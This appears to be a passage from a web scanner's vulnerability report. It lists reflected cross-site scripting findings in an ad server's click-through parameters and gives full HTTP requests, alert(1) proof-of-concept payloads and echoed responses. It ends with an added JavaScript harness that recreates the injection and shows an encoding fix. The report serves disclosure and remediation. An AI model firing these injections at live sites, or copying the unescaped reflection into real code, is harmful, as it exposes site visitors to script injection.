Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c42e"-alert(1)-"eccd2896247 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x901c42e"-alert(1)-"eccd2896247&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x901c42e"-alert(1)-"eccd2896247&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var
...[SNIP]...

3.13. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 720f7'-alert(1)-'6112183b0f2 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90720f7'-alert(1)-'6112183b0f2&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90720f7'-alert(1)-'6112183b0f2&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.14. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40c72"-alert(1)-"dbe1a9ec6e was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt240c72"-alert(1)-"dbe1a9ec6e&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6747

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt240c72"-alert(1)-"dbe1a9ec6e&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5
...[SNIP]...

3.15. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [camp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d10f2'-alert(1)-'f317ac05d12 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2d10f2'-alert(1)-'f317ac05d12&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2d10f2'-alert(1)-'f317ac05d12&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5
...[SNIP]...

3.16. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8125"-alert(1)-"445d6a35394 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=a8125"-alert(1)-"445d6a35394 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
w.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=a8125"-alert(1)-"445d6a35394http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

3.17. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [goto parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fccb'-alert(1)-'facab827203 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=9fccb'-alert(1)-'facab827203 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
w.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=9fccb'-alert(1)-'facab827203http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.18. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c0fb'-alert(1)-'c291a30757 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&1c0fb'-alert(1)-'c291a30757=1 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:53:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6759

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&1c0fb'-alert(1)-'c291a30757=1http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\">
...[SNIP]...

3.19. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be867"-alert(1)-"9ef92a9fab1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&be867"-alert(1)-"9ef92a9fab1=1 HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:53:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6763

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&be867"-alert(1)-"9ef92a9fab1=1http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

3.20. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93369"-alert(1)-"a86203937ad was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html93369"-alert(1)-"a86203937ad&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
88564%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html93369"-alert(1)-"a86203937ad&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?bran
...[SNIP]...

3.21. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5295.NewYorkTimes/B4885922

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 973ee'-alert(1)-'aef67755056 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html973ee'-alert(1)-'aef67755056&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6751

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
88564%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html973ee'-alert(1)-'aef67755056&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?bran
...[SNIP]...
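Every issue detail above describes the same pattern: a click-through parameter (snr, snx, ad, camp, goto, opzn&page, pos, or the name of any extra parameter) is copied verbatim into a JavaScript string literal in the ad server's document.write(...) output, and a payload of the form x'-alert(1)-'y (or x"-alert(1)-"y for the double-quoted var url = "..." context seen in the 3.12-style responses) closes that literal. The minus signs are what keep the response parseable: 'prefix'-alert(1)-'suffix' is a valid expression that calls alert and evaluates to NaN, so the rest of the script still runs. The JavaScript below is an added example, not code from this report or from the ad server: it rebuilds both contexts in reduced form, runs the generated script with document.write and alert stubbed so the payload can be seen firing, and then applies the fix the remediation text implies, strict percent-encoding of every parameter name and value before it is embedded. The builder and helper names, the reduced response shape, and the sample parameter values are assumptions for illustration.

```javascript
// Added example (not from the original report or the ad server's code). Reconstructs the
// reflection the scanner describes: a click-through parameter lands verbatim inside a JS
// string literal in a document.write(...) response. Names and sample values are assumptions.

// Reduced shape of the captured /adj responses. quote selects which context to mirror:
//   "'"  -> document.write('<a ... href="...click URL...">')  (single-quote findings, e.g. 3.10)
//   '"'  -> var url = "...click URL...";                        (double-quote findings, e.g. 3.14)
function buildAdScript(clickParams, encodeValue, quote = "'") {
  const qs = Object.entries(clickParams)
    .map(([k, v]) => encodeValue(k) + '=' + encodeValue(v)) // names are reflected too (3.18, 3.19)
    .join('&');
  const clickUrl = 'http://www.nytimes.com/adx/bin/adx_click.html?' + qs;
  return quote === "'"
    ? "document.write('<a target=\"_blank\" href=\"" + clickUrl + "\">ad</a>');"
    : 'var url = "' + clickUrl + '"; document.write(\'<a href="\' + url + \'">ad</a>\');';
}

// Vulnerable behaviour: the value is echoed unmodified.
const identity = v => String(v);

// Fix: strict percent-encoding. encodeURIComponent alone is not enough, because it leaves
// ! ' ( ) * ~ untouched (RFC 3986 unreserved), so x'-alert(1)-'y would pass through intact.
function strictUrlEncode(v) {
  return encodeURIComponent(String(v)).replace(/[!'()*~]/g,
    ch => '%' + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0'));
}

// Execute a generated response with document.write and alert stubbed, and report whether the
// injected alert ran and what HTML would have reached the page.
function runAdScript(script) {
  const result = { alertCalls: 0, written: '' };
  const doc = { write: s => { result.written += String(s); } };
  const alertStub = () => { result.alertCalls += 1; };
  new Function('document', 'alert', script)(doc, alertStub);
  return result;
}

function demo(params, encodeValue, quote) {
  return runAdScript(buildAdScript(params, encodeValue, quote));
}

// Constructed inputs modelled on the payloads in findings 3.10 (snr) and 3.14 (camp).
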